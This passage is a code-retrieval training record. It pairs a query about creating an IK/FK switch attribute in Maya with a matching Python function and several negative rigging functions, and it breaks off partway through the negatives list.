query
stringlengths
9
3.4k
document
stringlengths
9
87.4k
metadata
dict
negatives
listlengths
4
101
negative_scores
listlengths
4
101
document_score
stringlengths
3
10
document_rank
stringclasses
102 values
Create an IK attribute on the given ctrl, connect IK handles to ik switch. Also connect fk ctrls and ik ctrls visibility to switch. This will create an 'IK' attr on the switch ctrl
def create_fk_ik_switch(switch_ctrl, ik_handles, fk_ctrls, ik_ctrls, vis_ctrl=None, switch_attr_name='IK', vis_attr_name='fkIkCtrlVis'): fk_ctrls = mc.ls(fk_ctrls) ik_ctrls = mc.ls(ik_ctrls) ik_handles = mc.ls(ik_handles) if not vis_ctrl: vis_ctrl = switch_ctrl # Create attributes if not mc.objExists(switch_ctrl+'.'+switch_attr_name): mc.addAttr(switch_ctrl, ln=switch_attr_name, min=0, max=1, k=1) if not mc.objExists(vis_ctrl+'.'+vis_attr_name): mc.addAttr(vis_ctrl, ln=vis_attr_name, at='enum', en='auto:fkOnly:ikOnly:both', k=1) # Connect ik handles for handle in ik_handles: mc.connectAttr(switch_ctrl+'.'+switch_attr_name, handle+'.ikBlend') # Create swicth for ik ctrl ik_choice = utils.create_node('choice', n=vis_attr_name+'_ik_choice') mc.connectAttr(vis_ctrl+'.'+vis_attr_name, ik_choice+'.selector') mc.connectAttr(switch_ctrl+'.'+switch_attr_name, ik_choice+'.input[0]') mc.setAttr(ik_choice+'.input[1]', 0) mc.setAttr(ik_choice+'.input[2]', 1) mc.setAttr(ik_choice+'.input[3]', 1) for ctrl in ik_ctrls: mc.setAttr(ctrl+'.v', l=0) mc.connectAttr(ik_choice+'.output', ctrl+'.v', f=1) mc.setAttr(ctrl+'.v', l=1) # Create swicth for ik ctrl fk_choice = utils.create_node('choice', n=vis_attr_name+'_fk_choice') fk_rv = utils.create_node('reverse', n=vis_attr_name+'_fk_choice') mc.connectAttr(switch_ctrl+'.'+switch_attr_name, fk_rv+'.inputX') mc.connectAttr(vis_ctrl+'.'+vis_attr_name, fk_choice+'.selector') mc.connectAttr(fk_rv+'.outputX', fk_choice+'.input[0]') mc.setAttr(fk_choice+'.input[1]', 1) mc.setAttr(fk_choice+'.input[2]', 0) mc.setAttr(fk_choice+'.input[3]', 1) for ctrl in fk_ctrls: mc.setAttr(ctrl+'.v', l=0) mc.connectAttr(fk_choice+'.output', ctrl+'.v', f=1) mc.setAttr(ctrl+'.v', l=1) return True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_soft_ik(ik_ctrl, ik_joints, ik_handle):\n\n # get name and constant variables\n name = ik_handle+'Soft'\n parent = utils.get_parent(ik_joints[0])\n ik_handle_parent = utils.get_parent(ik_handle)\n\n # get total length of joint chain\n chain_length = 0\n for jnt in ik_joints[1:]:\n chain_length += abs(mc.getAttr(jnt+'.tx'))\n\n mc.addAttr(ik_joints[0], ln='softIkChainLength', k=1, dv=chain_length)\n\n #create dist node, (distance between top ik_joint and ik_handle) = X\n soft_ik_root = utils.snap_locator(ik_joints[0], node_type='transform')\n soft_ik_root = mc.rename(soft_ik_root, name+'_root_'+utils.get_suffix('transform'))\n\n dist = utils.create_distance_reader(soft_ik_root, ik_handle_parent)\n\n #create the dSoft and softIK attributes on the controller\n mc.addAttr(ik_ctrl, ln='softIK', min=0, k=1)\n ctrl_clamp = mc.createNode('clamp')\n mc.connectAttr(ik_ctrl+'.softIK', ctrl_clamp+'.inputR')\n mc.setAttr(ctrl_clamp+'.minR', 0.0001)\n mc.setAttr(ctrl_clamp+'.maxR', 10000000)\n\n #create node network for soft IK\n da_pma = mc.createNode('plusMinusAverage', n=name+'_da_pma')\n x_minus_da_pma = mc.createNode('plusMinusAverage', n=name+'_x_minus_da_pma')\n negate_x_minus_md = mc.createNode('multiplyDivide', n=name+'_negate_x_minus_md')\n divBy_dSoft_md = mc.createNode('multiplyDivide', n=name+'_divBy_dSoft_md')\n pow_e_md = mc.createNode('multiplyDivide', n=name+'_pow_e_md')\n one_minus_pow_e_pma = mc.createNode('plusMinusAverage', n=name+'_one_minus_pow_e_pma')\n times_dSoft_md = mc.createNode('multiplyDivide', n=name+'_times_dSoft_md')\n plus_da_pma = mc.createNode('plusMinusAverage', n=name+'_plus_da_pma')\n da_cond = mc.createNode('condition', n=name+'_da_cond')\n dist_diff_pma = mc.createNode('plusMinusAverage', n=name+'_dist_diff_pma')\n defaultPos_pma = mc.createNode('plusMinusAverage', n=name+'_defaultPos_pma')\n\n #set operations\n mc.setAttr(da_pma+'.operation', 2)\n mc.setAttr(x_minus_da_pma+'.operation', 2)\n mc.setAttr(negate_x_minus_md+'.operation', 1)\n mc.setAttr(divBy_dSoft_md+'.operation', 2)\n mc.setAttr(pow_e_md+'.operation', 3)\n mc.setAttr(one_minus_pow_e_pma+'.operation', 2)\n mc.setAttr(times_dSoft_md+'.operation', 1)\n mc.setAttr(plus_da_pma+'.operation', 1)\n mc.setAttr(da_cond+'.operation', 5)\n mc.setAttr(dist_diff_pma+'.operation', 2)\n mc.setAttr(defaultPos_pma+'.operation', 2)\n\n #make connections\n mc.connectAttr(ik_joints[0]+'.softIkChainLength', da_pma+'.input1D[0]')\n mc.connectAttr(ctrl_clamp+'.outputR', da_pma+'.input1D[1]')\n\n mc.connectAttr(dist+'.localDistance', x_minus_da_pma+'.input1D[0]')\n mc.connectAttr(da_pma+'.output1D', x_minus_da_pma+'.input1D[1]')\n\n mc.connectAttr(x_minus_da_pma+'.output1D', negate_x_minus_md+'.input1X')\n mc.setAttr(negate_x_minus_md+'.input2X', -1)\n\n mc.connectAttr(negate_x_minus_md+'.outputX', divBy_dSoft_md+'.input1X')\n mc.connectAttr(ctrl_clamp+'.outputR', divBy_dSoft_md+'.input2X')\n\n mc.setAttr(pow_e_md+'.input1X', 2.718281828)\n mc.connectAttr(divBy_dSoft_md+'.outputX', pow_e_md+'.input2X')\n\n mc.setAttr(one_minus_pow_e_pma+'.input1D[0]', 1)\n mc.connectAttr(pow_e_md+'.outputX' , one_minus_pow_e_pma+'.input1D[1]')\n\n mc.connectAttr(one_minus_pow_e_pma+'.output1D', times_dSoft_md+'.input1X')\n mc.connectAttr(ctrl_clamp+'.outputR', times_dSoft_md+'.input2X')\n\n mc.connectAttr(times_dSoft_md+'.outputX', plus_da_pma+'.input1D[0]')\n mc.connectAttr(da_pma+'.output1D', plus_da_pma+'.input1D[1]')\n\n mc.connectAttr(da_pma+'.output1D', da_cond+'.firstTerm')\n mc.connectAttr(dist+'.localDistance', da_cond+'.secondTerm')\n mc.connectAttr(dist+'.localDistance', da_cond+'.colorIfFalseR')\n mc.connectAttr(plus_da_pma+'.output1D', da_cond+'.colorIfTrueR')\n\n mc.connectAttr(da_cond+'.outColorR', dist_diff_pma+'.input1D[0]')\n mc.connectAttr(dist+'.localDistance', dist_diff_pma+'.input1D[1]')\n\n mc.setAttr(defaultPos_pma+'.input1D[0]', 0)\n mc.connectAttr(dist_diff_pma+'.output1D', defaultPos_pma+'.input1D[1]')\n\n # Create new ik aim node\n up = [1,0,0]\n aim = [0,1,0]\n\n grp = mc.createNode('transform', n=name+'_soft_aim_'+utils.get_suffix('transform'), p=ik_handle_parent)\n gAim = mc.createNode('transform', n=name+'_soft_'+utils.get_suffix('transform'), p=grp)\n\n mc.aimConstraint(soft_ik_root,\n grp,\n aim=aim,\n u=up,\n wu=up,\n wut='objectRotation',\n wuo=ik_ctrl,\n n=grp+'_ac')\n\n mc.connectAttr(defaultPos_pma+'.output1D', gAim+'.ty')\n mc.pointConstraint(gAim, ik_handle)\n mc.parent(ik_handle, gAim)\n\n # parent stuff\n if parent:\n mc.parent(soft_ik_root, parent)\n\n return gAim", "def switch_to_ik(robot):\n\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n fk_ctrls_path = format_path(__FK_CTRLS_PATH, robot)\n\n try:\n # Turn FK control visibility off\n pm.setAttr(fk_ctrls_path + '.v', 0)\n\n # Turn IK control visibility on\n pm.setAttr(target_ctrl_path + '.v', 1)\n pm.setAttr(format_path(__TARGET_CTRL_PATH + '|{1}target_CTRLShape',\n robot) + '.visibility', 1)\n\n if pm.objExists(tool_ctrl_path):\n pm.setAttr(tool_ctrl_path + '.v'.format(robot), 1)\n except:\n # These aren't crucial to the switch as they're just visual, and \n # a connection or locking of any of these attributes might throw\n # an error, so let's just skip it\n pass\n \n try:\n # Snap IK Ctrl to FK location\n _snap_ik_target_to_fk(robot)\n except:\n raise MimicError('Error swithching to IK; could not snap IK CTRL to FK')\n\n ## Find closest IK configuration to current FK pose ##\n # Get FK config and all IK solutions\n ik_sols = find_ik_solutions(robot)\n fk_config = find_fk_config(robot)\n\n # Remove all MFG-specific offsets from the FK config\n solver_params = get_solver_params(robot)\n axis_offsets = solver_params.axis_offsets\n rot_directions = solver_params.rot_directions\n fk_config_norm = _normalize_fk_pose(fk_config, axis_offsets, rot_directions)\n\n ## TO-DO: account for FK config rotations above and below 180 degrees\n # Select the closes IK configuration to the given FK config\n ik_config = find_closest_config(fk_config_norm, ik_sols)\n\n # Match IK config to FK pose\n pm.setAttr(target_ctrl_path + '.ikSolution1', ik_config[0])\n pm.setAttr(target_ctrl_path + '.ikSolution2', ik_config[1])\n pm.setAttr(target_ctrl_path + '.ikSolution3', ik_config[2])\n\n # turn ik solve back on\n pm.setAttr(target_ctrl_path + '.ik', 1)", "def make_fkikSwitch_connection_attrs(partpre=None, side='Lt', source_ctrl=None, tag_name='switch', snapTo=None,\n add_attrs=None):\n\n switch_anim = ''\n if source_ctrl is not None:\n switch_anim = source_ctrl\n\n partpre = partpre\n if partpre == '':\n partpre = 'mypart_'\n\n if source_ctrl is None:\n # filepath = r'C:/Users/Nicob/Documents/maya/scripts/rigBot/rigBot/config/switcher_anim.mb'\n system_base_path = os.path.dirname(utils.__file__)\n base_path = os.path.join(system_base_path, 'config')\n file_path = os.path.join(base_path, 'switcher_anim.mb')\n newnodes = mc.file(filepath, i=1, ignoreVersion=1, rnn=1, mergeNamespacesOnClash=0, rpr=partpre, ra=1,\n options=\"v=0;\", pr=1)\n\n switch_anim = partpre + '_CTL'\n\n # pos switcher grpOffset node if snapTo\n\n if snapTo is not None:\n utils.snap_to_transform(snapTo, switch_anim.replace('CTL', 'grpOffset'))\n mc.setAttr(switch_anim.replace('CTL', 'grpOffset') + '.r', 0, 0, 0)\n\n # get value of tags and sort into ik and fk vis groups\n\n iks = []\n fks = []\n nodes = mc.ls('*.' + tag_name)\n\n for node in nodes:\n if partpre in node and side in node:\n mode = mc.getAttr(node)\n if mode:\n mode = mode.lower()\n if 'ik' in mode:\n iks.append(node.split('.')[0])\n if 'fk' in mode:\n fks.append(node.split('.')[0])\n for ik in iks:\n # ikparpar=utils.get_parent(ik)\n ikpar = utils.get_parent(ik)\n if ikpar is None:\n mc.connectAttr(switch_anim + '.FK_IK', ik + '.visiblity', f=1)\n else:\n mc.connectAttr(switch_anim + '.FK_IK', ikpar + '.visibility', f=1)\n rvn = mc.createNode('reverse', name=switch_anim + '_fkik_vis_rv')\n mc.connectAttr(switch_anim + '.FK_IK', rvn + '.inputX')\n for fk in fks:\n fkpar = utils.get_parent(fk)\n if fkpar:\n mc.connectAttr(rvn + '.outputX', fkpar + '.visibility', f=1)\n if add_attrs is not None:\n for att in add_attrs:\n mc.addAttr(switch_anim, ln=att, min=0, max=1, dv=0, k=1)\n\n nns = []\n\n for nn in reversed(newnodes):\n nnn = ''\n sn = nn.split(\"|\")\n nnn = mc.rename(nn, sn[-1])\n nns.append(nnn)\n\n anim = mc.ls(partpre + '_CTL')\n\n # if mc.objExists (partpre+'_skeleton_grp'):\n # mc.parent (anim, partpre+'_skeleton_grp' )\n return anim", "def create_ik_setup(controls, joints):\n\n # Create control offset transforms\n exp_tf_ms = []\n for ctl in controls:\n par = cmds.listRelatives(ctl, parent=True)\n buf = create_offset_transform(ctl, BUF)\n exp = create_offset_transform(ctl, EXP)\n off = create_offset_transform(ctl, OFF)\n cmds.parent(ctl, off)\n cmds.parent(off, exp)\n cmds.parent(exp, buf)\n if par:\n cmds.parent(buf, par[0])\n exp_tf_ms.append(buf)\n\n root_control, pole_control, goal_control = controls\n handle, effector = cmds.ikHandle(sj=joints[0], ee=joints[-1], sol='ikRPsolver')\n cmds.setAttr('{}.hiddenInOutliner'.format(handle), True)\n cmds.orientConstraint(goal_control, joints[-1], mo=True)\n cmds.parent(handle, goal_control)\n cmds.hide(handle)\n\n # Connect root control to ik joint offset group\n ik_joints_offset = cmds.listRelatives(joints[0], p=True)[0]\n cmds.parentConstraint(root_control, ik_joints_offset, mo=True)\n cmds.scaleConstraint(root_control, ik_joints_offset, mo=True)\n\n # Connect twisting and pole vector control\n cmds.addAttr(goal_control, ln='twist', at='float', k=True)\n cmds.connectAttr('{}.twist'.format(goal_control), '{}.twist'.format(handle))\n cmds.poleVectorConstraint(pole_control, handle)\n\n # Add PV visibility attribute\n cmds.addAttr(goal_control, shortName='pv', longName='poleVector', at='bool', k=True)\n cmds.connectAttr('{}.pv'.format(goal_control), '{}.v'.format(pole_control))\n cmds.setAttr('{}.pv'.format(goal_control),1)\n\n # Add curve that points elbow to pole control\n crv = cmds.curve(p=[[0, 0, 0], [0, 1, 0]], d=1)\n cmds.connectAttr('{}.visibility'.format(pole_control), '{}.visibility'.format(crv))\n lock_hide_attrs(crv, attrs=['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz'])\n cmds.setAttr('{}.overrideEnabled'.format(crv), True)\n cmds.setAttr('{}.overrideDisplayType'.format(crv), 2)\n decomp_joint = cmds.createNode('decomposeMatrix')\n decomp_control = cmds.createNode('decomposeMatrix')\n cmds.connectAttr('{}.worldMatrix'.format(joints[1]), '{}.inputMatrix'.format(decomp_joint))\n cmds.connectAttr('{}.worldMatrix'.format(pole_control), '{}.inputMatrix'.format(decomp_control))\n cmds.connectAttr('{}.outputTranslate'.format(decomp_joint), '{}.controlPoints[0]'.format(crv))\n cmds.connectAttr('{}.outputTranslate'.format(decomp_control), '{}.controlPoints[1]'.format(crv))\n\n return handle, crv, exp_tf_ms", "def switch_setup(params, rig, ik_joints):\n\n # Duplicate for bind skeleton\n skeleton = [x.name() for x in params['ikSkeleton']]\n bind_skeleton = cmds.duplicate(skeleton, n=skeleton[0] + '_bnd_0')\n #bind_skeleton\n\n # Hide all attribute on Controller\n fkikcontrol = params['fkIkSwitch'].name()\n attrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v']\n for i in attrs:\n cmds.setAttr('{node}.{attr}'.format(node=fkikcontrol, attr=i), k=False, cb=False)\n\n # Create FK/IK Switch attributes\n cmds.addAttr(fkikcontrol, sn='FKIKBlend', at='float', min=0, max=1, dv=0, k=True)\n cmds.addAttr(fkikcontrol, sn='AutoVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='FKVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='IKVis', at='bool', dv=1, k=True)\n\n # create control offset transforms\n # par = cmds.listRelatives(fkikcontrol, parent=True)\n # buf = create_offset_transform(fkikcontrol, BUF)\n # cmds.parent(fkikcontrol, buf)\n # if par: cmds.parent(buf, par[0])\n\n # Parent Skeleton to rig group\n ik_skeleton = [x.name() for x in params['ikSkeleton']]\n fk_skeleton = [x.name() for x in params['fkSkeleton']]\n cmds.parent(ik_skeleton[0], rig['rigGroup'])\n cmds.parent(fk_skeleton[0], rig['rigGroup'])\n\n # Constraint Bind Skeleton\n fk_ik_finish(ik_joints, bind_skeleton, params)", "def setCtrls(self, fks, ik, upv):\n # type: (list[str], str, str) -> None\n\n self.fkCtrls = [self._getNode(x) for x in fks]\n self.fkTargets = [self._getMth(x) for x in fks]\n\n self.ikCtrl = self._getNode(ik)\n self.ikTarget = self._getMth(ik)\n\n self.upvCtrl = self._getNode(upv)\n self.upvTarget = self._getMth(upv)\n\n self.ikRotCtrl = self._getNode(ik.replace(\"_ik_\", \"_rot_\"))\n self.ikRotTarget = self.ikTarget", "def key_ik(*args):\n\n robots = get_robot_roots()\n if not robots:\n pm.warning('No robots selected')\n return\n\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n fk_ctrls_path = format_path(__FK_CTRLS_PATH, robot)\n\n if not pm.getAttr(target_ctrl_path + '.ik'):\n switch_to_ik(robot)\n\n ik_attributes = ['ik',\n 'v',\n 'ikSolution1',\n 'ikSolution2',\n 'ikSolution3']\n\n # Key all IK elements\n for attr in ik_attributes:\n pm.setKeyframe(target_ctrl_path, attribute=attr)\n\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='v')\n\n fk_pose = find_fk_config(robot)\n\n # Key all FK elements\n pm.setKeyframe(format_path(__A1_FK_CTRL_PATH, robot),\n attribute='rotateY',\n value=fk_pose[0])\n pm.setKeyframe(format_path(__A2_FK_CTRL_PATH, robot),\n attribute='rotateX',\n value=fk_pose[1])\n pm.setKeyframe(format_path(__A3_FK_CTRL_PATH, robot),\n attribute='rotateX',\n value=fk_pose[2])\n pm.setKeyframe(format_path(__A4_FK_CTRL_PATH, robot),\n attribute='rotateZ',\n value=fk_pose[3])\n pm.setKeyframe(format_path(__A5_FK_CTRL_PATH, robot),\n attribute='rotateX',\n value=fk_pose[4])\n pm.setKeyframe(format_path(__A6_FK_CTRL_PATH, robot),\n attribute='rotateZ',\n value=fk_pose[5])\n\n # Key visibility of FK controllers\n pm.setKeyframe(fk_ctrls_path, attribute='visibility')\n\n # Key tool controllers\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='translate')\n pm.setKeyframe(tool_ctrl_path, attribute='rotate')\n else:\n pm.setKeyframe(target_ctrl_path, attribute='translate')\n pm.setKeyframe(target_ctrl_path, attribute='rotate')", "def switch_to_fk(robot):\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n fk_ctrls_path = format_path(__FK_CTRLS_PATH, robot)\n\n # Turn IK control visibility off\n pm.setAttr(get_target_ctrl_path(robot) + '.v', 0)\n\n if pm.objExists(tool_ctrl_path):\n pm.setAttr(tool_ctrl_path + '.v'.format(robot), 0)\n\n # Turn FK control visibility on\n pm.setAttr(fk_ctrls_path + '.v'.format(robot), 1)\n\n # Find axis angles from IK pose, and match FK control handles\n fk_config = find_fk_config(robot)\n fk_config = _reconcile_fk_pose(robot, fk_config)\n\n pm.setAttr(format_path(__A1_FK_CTRL_PATH, robot) + '.rotateY',\n fk_config[0])\n pm.setAttr(format_path(__A2_FK_CTRL_PATH, robot) + '.rotateX',\n fk_config[1])\n pm.setAttr(format_path(__A3_FK_CTRL_PATH, robot) + '.rotateX',\n fk_config[2])\n pm.setAttr(format_path(__A4_FK_CTRL_PATH, robot) + '.rotateZ',\n fk_config[3])\n pm.setAttr(format_path(__A5_FK_CTRL_PATH, robot) + '.rotateX',\n fk_config[4])\n pm.setAttr(format_path(__A6_FK_CTRL_PATH, robot) + '.rotateZ',\n fk_config[5])\n\n pm.setAttr(target_ctrl_path + '.ik', 0)", "def toggle_ik_fk(*args):\n\n current_tab = pm.tabLayout('switcher_tab_layout',\n query=True,\n selectTab=True)\n\n if current_tab == 'ikTab':\n ik_tab = 1\n else:\n ik_tab = 0\n\n robots = get_robot_roots(1)\n if not robots:\n return\n\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n \n if ik_tab:\n if pm.getAttr(target_ctrl_path + '.ik'):\n continue\n\n switch_to_ik(robot)\n\n else:\n if not pm.getAttr(target_ctrl_path + '.ik'):\n continue\n\n switch_to_fk(robot)\n \n # Maintain appropriate selections on each robot\n try:\n selection = []\n active_robots = get_robot_roots()\n if active_robots:\n if ik_tab:\n for robot in active_robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n\n if pm.objExists(tool_ctrl_path):\n selection.append(tool_ctrl_path)\n else:\n selection.append(target_ctrl_path)\n else:\n for robot in active_robots:\n selection.append(format_path(__A6_FK_CTRL_PATH, robot))\n \n pm.select(selection)\n else:\n pass\n\n except:\n pm.warning('Error selecting after IK/FK switch')", "def SetControlSignals(inst_spec, itype, ctrl):\n\n itype <<= inst_spec.itype\n\n #\n # The Literal() function (see instructions.py) generates an Atlas 'literal'\n # value that can be used on the right-hand side of an assignment (as is done\n # below).\n #\n\n ctrl.ex <<= inst_spec.ex_ctrl.Literal()\n ctrl.mem <<= inst_spec.mem_ctrl.Literal()\n ctrl.wb <<= inst_spec.wb_ctrl.Literal()", "def ikfkMechanics(module, extraName, jnts, mechSkelGrp, ctrlGrp, moduleType, rig):\n jntSuffix = suffix['joint']\n newJntChains = []\n ## create duplicate chains\n for chain in ['IK', 'FK']:\n newJnts = utils.duplicateJntChain(chain, jnts, parent=mechSkelGrp.name)\n newJntChains.append(newJnts)\n ikJnts = newJntChains[0]\n fkJnts = newJntChains[1]\n for i, each in enumerate(jnts):\n newName = '{}_result{}'.format(each.rsplit('_', 1)[0], jntSuffix)\n jnts[i] = cmds.rename(each, newName)\n # utils.addJntToSkinJnt(jnts[i], rig=rig)\n ## settings control\n module.settingCtrl = ctrlFn.ctrl(name='{}{}Settings'.format(extraName, moduleType),\n guide='{}{}Settings{}'.format(module.moduleName,\n moduleType, suffix['locator']),\n deleteGuide=True, side=module.side, skipNum=True,\n parent=module.rig.settingCtrlsGrp.name,\n scaleOffset=rig.scaleOffset, rig=rig)\n if moduleType == 'arm':\n settingJnt = jnts[3]\n else:\n settingJnt = jnts[2]\n module.settingCtrl.makeSettingCtrl(ikfk=True, parent=settingJnt)\n ## parent constraints\n for jnt, ikJnt, fkJnt in zip(jnts, ikJnts, fkJnts):\n parConstr = cmds.parentConstraint(ikJnt, fkJnt, jnt)\n cmds.connectAttr(module.settingCtrl.ctrl.ikfkSwitch, '{}.{}W1'.format(parConstr[0], fkJnt))\n swRev = utils.newNode('reverse', name='{}{}IKFKSw'.format(extraName, moduleType),\n side=module.side)\n swRev.connect('inputX', module.settingCtrl.ctrl.ikfkSwitch, mode='to')\n swRev.connect('outputX', '{}.{}W0'.format(parConstr[0], ikJnt), mode='from')\n ## control vis groups\n ikCtrlGrp = utils.newNode('group', name='{}{}IKCtrls'.format(extraName, moduleType),\n side=module.side, parent=ctrlGrp.name, skipNum=True)\n fkCtrlGrp = utils.newNode('group', name='{}{}FKCtrls'.format(extraName, moduleType),\n side=module.side, parent=ctrlGrp.name, skipNum=True)\n cmds.setDrivenKeyframe(ikCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=0.999, v=1)\n cmds.setDrivenKeyframe(ikCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=1, v=0)\n cmds.setDrivenKeyframe(fkCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=0.001, v=1)\n cmds.setDrivenKeyframe(fkCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=0, v=0)\n return ikJnts, fkJnts, jnts, ikCtrlGrp, fkCtrlGrp", "def add_attr(nc_handle, var_name, key, value):\n doi_attr_name = 'DOI'\n nc.variables[varname].setncattr(key, value)", "def ik_to_fk(node):\n ik_main_off = get_parent(node.ik_main_conn)\n fk_01_off = get_parent(node.fk_01_conn)\n fk_02_off = get_parent(node.fk_02_conn)\n fk_03_off = get_parent(node.fk_03_conn)\n\n ik_main_world_trans = get_world_trans(node.ik_main_conn)\n fk_01_world_trans = get_world_trans(node.fk_01_conn)\n ik_main_off_world_trans = get_world_trans(ik_main_off)\n fk_01_off_world_trans = get_world_trans(fk_01_off)\n fk_02_off_world_trans = get_world_trans(fk_02_off)\n fk_03_off_world_trans = get_world_trans(fk_03_off)\n\n # calculate base information\n def_len = (ik_main_off_world_trans - fk_01_off_world_trans).length()\n\n # Calculate ik direction\n ik_dir_01 = ik_main_off_world_trans - fk_01_off_world_trans\n ik_dir_02 = ik_main_world_trans - fk_01_world_trans\n\n ik_dir_rot = ik_dir_01.rotateTo(ik_dir_02).asEulerRotation()\n\n # Apply ik direction -> important to calculate correct pole rotations\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(ik_dir_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ik pole rotations\n ik_pole_world_mat = get_world_matrix(node.ik_pole_conn, 0)\n fk_03_world_inv_mat = get_world_inv_matrix(node.fk_01_conn, 0)\n\n ik_pole_rot_mat = ik_pole_world_mat * fk_03_world_inv_mat\n\n ik_pole_vec = oMa.MTransformationMatrix(ik_pole_rot_mat).translation(oMa.MSpace.kWorld)\n ik_pole_vec.y = 0\n\n ik_pole_rot = oMa.MVector.kZaxisVector.rotateTo(ik_pole_vec).asEulerRotation()\n\n # Calculate ik rotations\n tri_a_len = (fk_02_off_world_trans - fk_01_off_world_trans).length()\n tri_b_len = (fk_03_off_world_trans - fk_02_off_world_trans).length()\n tri_c_len = (ik_main_world_trans - fk_01_world_trans).length()\n\n if tri_c_len >= def_len:\n fk_02_angle = 0\n fk_01_angle = 0\n else:\n fk_02_angle = math.pi - solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"C\")\n fk_01_angle = -solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"B\")\n\n # Add rotations together\n fk_01_temp = oMa.MEulerRotation(fk_01_angle, ik_pole_rot.y, 0)\n\n ik_dir_mat = compose_mat(ik_dir_rot)\n fk_01_mat = compose_mat(fk_01_temp)\n rot_mat = fk_01_mat * ik_dir_mat\n\n # Apply everything\n fk_01_rot = get_rot_from_mat(rot_mat)\n fk_02_rot = (fk_02_angle, 0, 0)\n\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_01_rot[i], oMa.MAngle.kRadians))\n\n fk_02_rot_plugs = get_rot_plugs(node.fk_02_conn)\n for i, plug in enumerate(fk_02_rot_plugs):\n if not plug.isLocked:\n plug.setMAngle(oMa.MAngle(fk_02_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ankle rotation\n fk_03_rot = rot_world_space_to_local_space(node.ik_main_conn, get_parent(node.fk_03_conn))\n\n fk_03_rot_plugs = get_rot_plugs(node.fk_03_conn)\n for i, plug in enumerate(fk_03_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_03_rot[i], oMa.MAngle.kRadians))", "def spline_ik(self):\n ikHandle, ikEffector, ikCurve = pm.ikHandle(\n name=self.name + \"_ikh\",\n startJoint=self.joints[0],\n endEffector=self.joints[-1],\n solver='ikSplineSolver',\n simplifyCurve=False\n )\n\n # Get the number of digits so we can set the zfill correctly,\n digits = len(str(len(ikCurve.cv)))\n\n # Iterate over each cv and create a cluster deformer,\n for i, cv in enumerate(ikCurve.cv):\n cluster_node, cluster_handle = pm.cluster(cv)\n cluster_handle.rename(\n ikCurve.nodeName() + '_ch_{}'.format(str(i).zfill(digits))\n )", "def delete_ik_fk_keys(*args):\n if not check_robot_selection():\n pm.warning('No robots selected; ' \\\n 'Select at least one robot.')\n\n keyed_attrs = {__TARGET_CTRL_PATH: ['ik',\n 'visibility',\n 'ikSolution1',\n 'ikSolution2',\n 'ikSolution3'],\n __FK_CTRLS_PATH: ['visibility'],\n __A1_FK_CTRL_PATH: ['rotateY'],\n __A2_FK_CTRL_PATH: ['rotateX'],\n __A3_FK_CTRL_PATH: ['rotateX'],\n __A4_FK_CTRL_PATH: ['rotateZ'],\n __A5_FK_CTRL_PATH: ['rotateX'],\n __A6_FK_CTRL_PATH: ['rotateZ']}\n\n robots = get_robot_roots()\n\n current_frame = pm.currentTime()\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n # Check if there's a keyframe set on the target_CTRL.ik attribute\n key = pm.keyframe(target_ctrl_path,\n attribute='ik',\n query=True,\n time=current_frame)\n\n # If there is no keyframe set on the IK attribute, continue to the\n # next robot\n if not key:\n pm.warning('{} has no IK|FK keyframe at frame {}' \\\n .format(robot, current_frame))\n continue\n\n # If there is a keyframe on the IK attribute, we also check if there's\n # a keyframe on an FK controller as well, as we only consider there to\n # be a proper IK or FK keyframe if both are true\n # Note, we only need to check a single FK controller as they should all\n # be keyframed (or not) together\n fk_test_handle_path = format_path(__A1_FK_CTRL_PATH + '.rotateY', robot)\n fk_key = pm.keyframe(fk_test_handle_path,\n query=True,\n time=current_frame)\n # If there is no keyframe set on the FK controller attribute,\n # continue to the next robot\n if not fk_key:\n pm.warning('{} has no IK|FK keyframe at frame {}' \\\n .format(robot, current_frame))\n continue \n\n for obj in keyed_attrs:\n for attr in keyed_attrs[obj]:\n pm.cutKey(format_path(obj, robot),\n time=current_frame,\n attribute=attr,\n option=\"keys\")\n\n if pm.objExists(tool_ctrl_path):\n pm.cutKey(tool_ctrl_path,\n time=current_frame,\n attribute='visibility',\n option=\"keys\")\n\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n pm.cutKey(tool_ctrl_path,\n time=current_frame,\n attribute='translate',\n option=\"keys\")\n pm.cutKey(tool_ctrl_path,\n time=current_frame,\n attribute='rotate',\n option=\"keys\")\n else:\n pm.cutKey(target_ctrl_path,\n time=current_frame,\n attribute='translate',\n option=\"keys\")\n pm.cutKey(target_ctrl_path,\n time=current_frame,\n attribute='rotate',\n option=\"keys\")", "def 